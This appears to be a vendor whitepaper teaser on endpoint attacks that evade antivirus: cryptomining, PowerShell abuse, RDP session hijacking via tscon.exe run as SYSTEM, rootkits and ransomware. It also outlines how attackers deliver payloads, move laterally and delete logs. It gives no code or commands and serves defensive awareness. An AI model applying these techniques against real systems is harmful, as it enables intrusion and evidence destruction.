5 Endpoint Attacks Your Antivirus Won’t Catch

  • For cyber attackers, the endpoint is THE point
  • How these attacks evade detection by antivirus
  • These 4 critical steps show how it’s done

Endpoints are the point of entry into your environment, your data, your credentials, and potentially your entire business. A compromised endpoint provides everything an attacker needs to gain a foothold on your network, steal data, and potentially hold it for ransom. Unless you protect your critical endpoints (including servers, laptops, and desktops), you may be leaving the front door wide open for attackers.

Attackers have figured out how to bypass traditional antivirus software with fileless attacks designer to hide within sanctioned applications and even within the OS itself.

Attackers have figured out how to bypass traditional antivirus software with fileless attacks designer to hide within sanctioned applications and even within the OS itself. So, even if you’re vigilant about installing patches and pushing out antivirus updates, your organization is likely still at risk. Keep reading to understand:

  • How attackers have adapted their tactics to evade traditional antivirus
  • How these increasingly common attacks work
  • How to quickly evolve your threat detection strategy

5 attacks your traditional antivirus won’t catch

1. Cryptomining malware

Cryptomining tools convert computing power into revenue. The cryptocurrency market is growing rapidly, and the Central Processing Unit (CPU) required to mine for cryptocurrencies happens to be very costly.1 So, attackers create malware and other attacks to quietly siphon computing resources from victims for cryptomining. Methods include:

  • Exploiting exposed AWS resources or AWS account credentials to steal cloud computing resources, often referred to as “cryptojacking”
  • Browser-based attacks that work while a visitor is browsing a legitimate, yet compromised website
  • Cryptomining malware, often delivered through phishing campaigns, that consumes CPU on your endpoints

Any flavor of cryptomining attacks can have disastrous effects for your business. Attackers can turn compromised endpoints and clouds into silent zombie armies of cryptocurrency miners–all without a single antivirus alert. Without advanced threat detection tools that span your endpoints and public clouds, your only indication that your computing resources may have been hijacked could be an application or network performance hit or a skyrocketing AWS invoice.

2. Reverse PowerShell attacks

Even in spy novels, everyone knows that the best way to avoid detection is to act like you belong. Attackers follow this approach, as they increasingly use PowerShell and other sanctioned services to evade traditional antivirus software. By gaining access to admin credentials and executing authorized administration actions, cyber attackers can reduce their reliance on malware and exploit kits and more easily evade detection, making for a stealthier data theft operation.

3. Remote desktop protocol (RDP) session jacking

The remote desktop protocol (RDP) enables you to remotely connect to a Windows system, usually requiring you to provide the user password before you can gain session access. However, a known exploit to bypass this is to run tscon.exe (the RDP client process) as SYSTEM user, which does not prompt you for a password. And, no antivirus alarms go off.

Pro-tip: Publicly available RDP services on your endpoints serve as an open invitation to attackers, so make sure your gateway firewall policy blocks these connections by default (or only allows connections from authorized IP addresses).

4. Advanced persistent threats (APTs) / rootkits

Advanced persistent threats (APTs) involve a series of steps, each of which can easily evade traditional methods of detection (we address each of these steps in detail in the next section). These blended threats often start with a phishing email to capture credentials and then move on to installing malware such as rootkits, which embed themselves deep into the endpoint’s OS. Once you’ve got root access at a kernel level, all bets are off and the system is fully owned.

5. Ransomware

Attackers know how to innovate. Recent ransomware innovations include offering ransomware-as-a-service, as well as targeting widely-used corporate cloud apps. One  example that easily evades antivirus is the ShurL0ckr ransomware, which targets cloud-based enterprise file sharing platforms. Ransomware-as-a-service  enables  attackers  to  pay its author a percentage of the ransom once the payload that encrypts the files on the disk is generated and distributed.

How these attacks evade detection by antivirus

While these attacks may have their differences, they share some specific characteristics that help them avoid detection by traditional antivirus tools.

While these attacks may have their differences, they share some specific characteristics that help them avoid detection by traditional antivirus tools.

These 4 critical steps show how it’s done.

1. Delivery

Signature-based antivirus tools try to catch and quarantine malicious files as they are downloaded or executed on endpoints. The problem is that modern attacks operate without downloading or executing malicious files on the hard drive. Instead, they utilize social engineering (phishing), exploit OS vulnerabilities, and package malicious code within normal-looking files to evade detection in the delivery process.

For example, a trojan can employ email phishing to deliver malicious code as a known software macro. Once an attacker has a foothold on the victim’s endpoint, they can use PowerShell to download the payload and propagate. And, because traditional antivirus is built to look for unusual files, PowerShell and other native processes run easily under their radar.

2. Evasion

The best offense is to use the native components of a system against itself. By using what’s already on an endpoint (e.g. tscon.exe, PowerShell, etc.), cyber attackers execute attacks much faster while also evading antivirus detection.

3. Lateral movement

Endpoints provide attackers a necessary foothold into a victim’s network. Once an endpoint is compromised–and any endpoint will do–the next step is to move laterally through the network to find desired assets and targets (domain admin credentials, file servers, etc.). Once an attacker has domain admin credentials, they can move literally anywhere within that domain, stealing and exfiltrating data without antivirus software triggering a single alert.

4. Cover tracks

After doing their dirty work, a smart attacker will cover their tracks. With domain admin credentials, attackers easily delete log files on each endpoint they used within that domain to avoid leaving critical forensic evidence behind for investigators. With one PowerShell script, all digital breadcrumbs of the theft disappear–and not a single antivirus tool is built to notice this.

To read full download the whitepaper:

Only $1/click

Submit Your Ad Here


Access the latest Information Technology white papers, research, case studies and more covering a wide range of topics like IT Management, Enterprise Management, Information Management , and Internet of Things (IOT).

Leave a Reply